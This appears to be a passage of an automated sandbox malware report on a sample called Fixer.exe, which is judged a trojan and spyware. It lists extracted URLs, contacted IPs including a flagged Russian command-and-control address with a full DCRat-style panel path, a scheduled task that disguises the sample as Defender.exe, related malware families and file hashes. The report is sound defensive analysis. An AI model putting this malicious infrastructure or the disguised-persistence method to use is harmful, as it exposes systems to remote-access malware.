                                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://tempuri.org/Entity/Id9ResponseFixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Fixer.exe, 00000000.00000002.2220918461.00000000042DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://tempuri.org/Entity/Id20Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://tempuri.org/Entity/Id21Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://tempuri.org/Entity/Id22Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://tempuri.org/Entity/Id23Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://tempuri.org/Entity/Id24Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/IssueFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://tempuri.org/Entity/Id24ResponseFixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://www.ecosia.org/newtab/Fixer.exe, 00000000.00000002.2220918461.00000000042DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://tempuri.org/Entity/Id1ResponseFixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedFixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://ocsp.sectigo.com0$Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe.0.dr, Defender.exe.4.drfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  		unknown
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlyFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/ReplayFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64BinaryFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeyFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://tempuri.org/Entity/Id21ResponseDFixer.exe, 00000000.00000002.2202938412.0000000003380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/08/addressingFixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/CompletionFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/trustFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://tempuri.org/Entity/Id10Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://tempuri.org/Entity/Id11Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://tempuri.org/Entity/Id10ResponseDFixer.exe, 00000000.00000002.2202938412.0000000003380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://tempuri.org/Entity/Id12Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://tempuri.org/Entity/Id16ResponseFixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/CancelFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://tempuri.org/Entity/Id13Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://tempuri.org/Entity/Id14Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://tempuri.org/Entity/Id15Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://tempuri.org/Entity/Id16Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/NonceFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                http://tempuri.org/Entity/Id17Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://tempuri.org/Entity/Id18Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    http://tempuri.org/Entity/Id5ResponseFixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      http://tempuri.org/Entity/Id19Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsFixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          http://tempuri.org/Entity/Id15ResponseDFixer.exe, 00000000.00000002.2202938412.00000000033F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            http://tempuri.org/Entity/Id10ResponseFixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RenewFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                http://tempuri.org/Entity/Id11ResponseDFixer.exe, 00000000.00000002.2202938412.0000000003380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  http://tempuri.org/Entity/Id8ResponseFixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    http://ocsp.sectigo.com0Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe.0.dr, Defender.exe.4.drfalse
                                                                                                                                                                                                                      		high

                                                                                                                                                                                                                      World Map of Contacted IPs

                                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                                                                      Public IPs

                                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                      89.23.97.121
                                                                                                                                                                                                                      		unknownRussian Federation
                                                                                                                                                                                                                      		48687MAXITEL-ASRUtrue
                                                                                                                                                                                                                      147.185.221.24
                                                                                                                                                                                                                      		et-seattle.gl.at.ply.ggUnited States
                                                                                                                                                                                                                      		12087SALSGIVERUSfalse

                                                                                                                                                                                                                      General Information

                                                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                      Analysis ID:1585853
                                                                                                                                                                                                                      Start date and time:2025-01-08 11:14:06 +01:00
                                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                      Overall analysis duration:0h 7m 19s
                                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                      Number of analysed new started processes analysed:20
                                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                                                      Sample name:Fixer.exe
                                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@18/14@1/2
                                                                                                                                                                                                                      EGA Information:
                                                                                                                                                                                                                      • Successful, ratio: 40%
                                                                                                                                                                                                                      HCA Information:
                                                                                                                                                                                                                      • Successful, ratio: 83%
                                                                                                                                                                                                                      • Number of executed functions: 93
                                                                                                                                                                                                                      • Number of non-executed functions: 2
                                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                                      • Found application associated with file extension: .exe

                                                                                                                                                                                                                      Warnings

                                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 20.189.173.21, 20.42.73.29, 4.245.163.56, 23.1.237.91, 13.107.246.45, 40.126.31.71
                                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                      • Execution Graph export aborted for target 6z9uno0baqvej0me.exe, PID 528 because it is empty
                                                                                                                                                                                                                      • Execution Graph export aborted for target Defender.exe, PID 1684 because it is empty
                                                                                                                                                                                                                      • Execution Graph export aborted for target FixerNerest.exe, PID 5480 because it is empty
                                                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                                                                                      Simulations

                                                                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                                                      05:15:03API Interceptor73x Sleep call for process: Fixer.exe modified
                                                                                                                                                                                                                      05:15:50API Interceptor2x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                                      11:15:31Task SchedulerRun new task: WindowsAPI path: C:\Windows\System32\Defender.exe

                                                                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                                                                      IPs

                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      89.23.97.121q3JT7kcpCR.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                                      • 89.23.97.121/Flowerprocessorjavascriptvideo/eternalbigload/test/4/Test/16Datalife8/HttpWpUploads/JsSqlSqlLine/UploadsCpuproton/Dbprotect/Local/Update/JsTemp/videolinepythonSql/flower/apiwordpressTest_/javascriptuniversal/ImageapiTemp.php
                                                                                                                                                                                                                      147.185.221.24spreadmalware.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                        7fqul5Zr8Y.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          loader.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            loader.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              P3A946MOFP.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                BootstrapperV1.16.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                  SharkHack.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                    avaydna.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                                                                                      ddos tool.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                        L988Ph5sKX.exeGet hashmaliciousXWormBrowse

                                                                                                                                                                                                                                          Domains

                                                                                                                                                                                                                                          No context

                                                                                                                                                                                                                                          ASNs

                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                          MAXITEL-ASRUT4qO1i2Jav.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                          • 89.23.100.42
                                                                                                                                                                                                                                          XNPOazHpXF.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                          • 89.23.96.180
                                                                                                                                                                                                                                          9FwQYJSj4N.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                          • 89.23.96.180
                                                                                                                                                                                                                                          bPkG0wTVon.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 89.23.100.233
                                                                                                                                                                                                                                          itLDZwgFNE.exeGet hashmaliciousFlesh StealerBrowse
                                                                                                                                                                                                                                          • 89.23.100.233
                                                                                                                                                                                                                                          3gJQoqWpxb.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 89.23.100.233
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                                                                                                                                                                          • 89.23.100.42
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                          • 89.23.100.42
                                                                                                                                                                                                                                          7fE6IkvYWf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 89.23.100.233
                                                                                                                                                                                                                                          iGxCM2I5u9.exeGet hashmaliciousFlesh StealerBrowse
                                                                                                                                                                                                                                          • 89.23.100.233
                                                                                                                                                                                                                                          SALSGIVERUSspreadmalware.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                          • 147.185.221.24
                                                                                                                                                                                                                                          7fqul5Zr8Y.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 147.185.221.24
                                                                                                                                                                                                                                          miori.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 147.168.252.34
                                                                                                                                                                                                                                          miori.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 147.184.86.253
                                                                                                                                                                                                                                          loader.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 147.185.221.24
                                                                                                                                                                                                                                          loader.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 147.185.221.24
                                                                                                                                                                                                                                          My33xbeYIX.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                                                                                          • 147.185.221.16
                                                                                                                                                                                                                                          YPzNsfg4nR.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                          • 147.185.221.21
                                                                                                                                                                                                                                          sela.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                                                                                          • 147.185.221.17
                                                                                                                                                                                                                                          P3A946MOFP.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                          • 147.185.221.24

                                                                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                                                                          No context

                                                                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                                                                          No context

                                                                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Defender.exe_37119e868656c0c54ca5ced9748d260d6f119_8cca7515_8d388940-38df-4e28-ac5d-2484feb1998d\Report.wer

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                                                          Entropy (8bit):1.1769756568540544
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:384:mqF4nYPLpFYaGbaiOUWRzuiFcXY4lO8Cv:mqF4OLpFYaqaCgzuiFcXY4lO8I
                                                                                                                                                                                                                                          MD5:8B9112DC2D6DB613F27A0A9E42160C23
                                                                                                                                                                                                                                          SHA1:6E5C9313990CD6775B1641704ADB7B9765D2A5A7
                                                                                                                                                                                                                                          SHA-256:D75DE7E24157AC5E659DD668993D430D160631CA9836E54D798DE0FA4CD8C9E1
                                                                                                                                                                                                                                          SHA-512:B9EA9AC22365331C19E2D6A108030B69AF55822629E013026F2C1AD41E74A4D1382022512A906491282A0620972D8365C4D19F00DCECDF9F23A304C8236C11CD
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.8.0.4.9.3.5.5.3.8.6.4.7.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.8.0.4.9.3.7.1.0.1.1.4.8.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.d.3.8.8.9.4.0.-.3.8.d.f.-.4.e.2.8.-.a.c.5.d.-.2.4.8.4.f.e.b.1.9.9.8.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.2.9.7.1.e.9.b.-.1.d.8.9.-.4.d.e.e.-.9.b.5.8.-.6.2.c.7.9.c.c.e.b.5.6.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.D.e.f.e.n.d.e.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.e.x.p.l.o.r.e.r.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.9.4.-.0.0.0.1.-.0.0.1.4.-.c.4.8.1.-.b.8.3.f.b.6.6.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.b.2.d.2.2.6.2.1.1.6.2.7.4.7.9.8.d.d.2.2.9.9.9.3.7.1.d.9.c.5.6.0.0.0.0.0.0.0.0.!.0.0.0.0.6.f.0.4.6.9.c.f.9.c.d.d.0.1.4.6.e.8.7.c.c.4.b.d.6.c.0.3.0.3.8.e.a.b.0.2.7.9.a.9.!.D.e.f.e.n.d.e.r...e.x.e.....T.a.r.

                                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Defender.exe_37119e868656c0c54ca5ced9748d260d6f119_8cca7515_ad190060-6d63-4299-b661-3ffd29efd1e8\Report.wer

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                                                          Entropy (8bit):1.1704496957934285
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:384:x5W4nAPLpFYaGbaJVx4tzuiFcXY4lO8Cv:x5W4GLpFYaqaN6zuiFcXY4lO8I
                                                                                                                                                                                                                                          MD5:3E1654901960FFA6658E27618B96418D
                                                                                                                                                                                                                                          SHA1:C052EB04DA6FF382FA9785FFAC8497681F1A9E7B
                                                                                                                                                                                                                                          SHA-256:72947DB36F2B806D539A6D2C6545CD776132F414B13B06621FD34A789D687AA8
                                                                                                                                                                                                                                          SHA-512:C80CF4AA85BCBA6FECC039A052470C8F06F4644C456E7A6B3F3C9F137D72E38DBEE52D1E8E1490ACCA72030A3FBC11F1BC3A5A31902181EA31635AC774F7B583
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.8.0.4.9.6.3.8.8.5.6.1.9.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.8.0.4.9.6.5.3.2.3.1.1.5.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.d.1.9.0.0.6.0.-.6.d.6.3.-.4.2.9.9.-.b.6.6.1.-.3.f.f.d.2.9.e.f.d.1.e.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.3.4.d.9.3.c.8.-.9.5.3.5.-.4.0.4.f.-.9.8.e.8.-.2.6.b.8.9.f.6.6.8.7.b.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.D.e.f.e.n.d.e.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.e.x.p.l.o.r.e.r.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.b.c.-.0.0.0.1.-.0.0.1.4.-.b.7.e.a.-.4.f.5.1.b.6.6.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.b.2.d.2.2.6.2.1.1.6.2.7.4.7.9.8.d.d.2.2.9.9.9.3.7.1.d.9.c.5.6.0.0.0.0.0.0.0.0.!.0.0.0.0.6.f.0.4.6.9.c.f.9.c.d.d.0.1.4.6.e.8.7.c.c.4.b.d.6.c.0.3.0.3.8.e.a.b.0.2.7.9.a.9.!.D.e.f.e.n.d.e.r...e.x.e.....T.a.r.

                                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER58DD.tmp.dmp

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                          File Type:Mini DuMP crash report, 16 streams, Wed Jan 8 10:16:04 2025, 0x1205a4 type
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):383752
                                                                                                                                                                                                                                          Entropy (8bit):3.600510482890374
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:lbAr62gPk/w4hBAOccSZMPFE4Gxo11qRpcimC1CCqYNFx3+vI6pbGzj:xc62gfZOIZM9E4Gxo12pcDgq23QHFGv
                                                                                                                                                                                                                                          MD5:17E7B740472620A30291E62573CC3B3F
                                                                                                                                                                                                                                          SHA1:C70EB4C7F4C410B7671542DBE29547001A6D2E14
                                                                                                                                                                                                                                          SHA-256:79D5468F618DDE782BB5B68AAF70A3646FB4C9C37C38B401977C7236827E719F
                                                                                                                                                                                                                                          SHA-512:47C88EE6BDFD16F2ED2C01FB03C3E800AE1848000B6D92750AE32FC05F7D3D06B97FF5DDD0CC07BF81C5823611391F366520573107A3DE0B075744A0EED1F7F3
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:MDMP..a..... .......dP~g....................................$....%...........%......t>...p..........l.......8...........T............5...............5...........7..............................................................................eJ.......8......Lw......................T...........aP~g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER5CE5.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):8804
                                                                                                                                                                                                                                          Entropy (8bit):3.6990628577232862
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:192:R6l7wVeJEIFo6YEhN7XgmfZ8lAmprRC89bsIMf0t6Em:R6lXJj66YEL7gmfuld7sjfko
                                                                                                                                                                                                                                          MD5:2E28945C273B14C4486596833B6FCB49
                                                                                                                                                                                                                                          SHA1:E4A03CDD202FA05CB894D0E19B58D5C464F9F5E1
                                                                                                                                                                                                                                          SHA-256:E8598E2963C5994E59A2C2EA5D18F51844C7CBD27C63889512344C27055184D8
                                                                                                                                                                                                                                          SHA-512:6AD9D1DE2FF70465161BD6FE36C3F7CEF0FCB4DA60C2236E4883C4D796DD26650CCF20EC8392CC25C987D671F00EF4533DBD6A015923354660504DEAC99CBB57
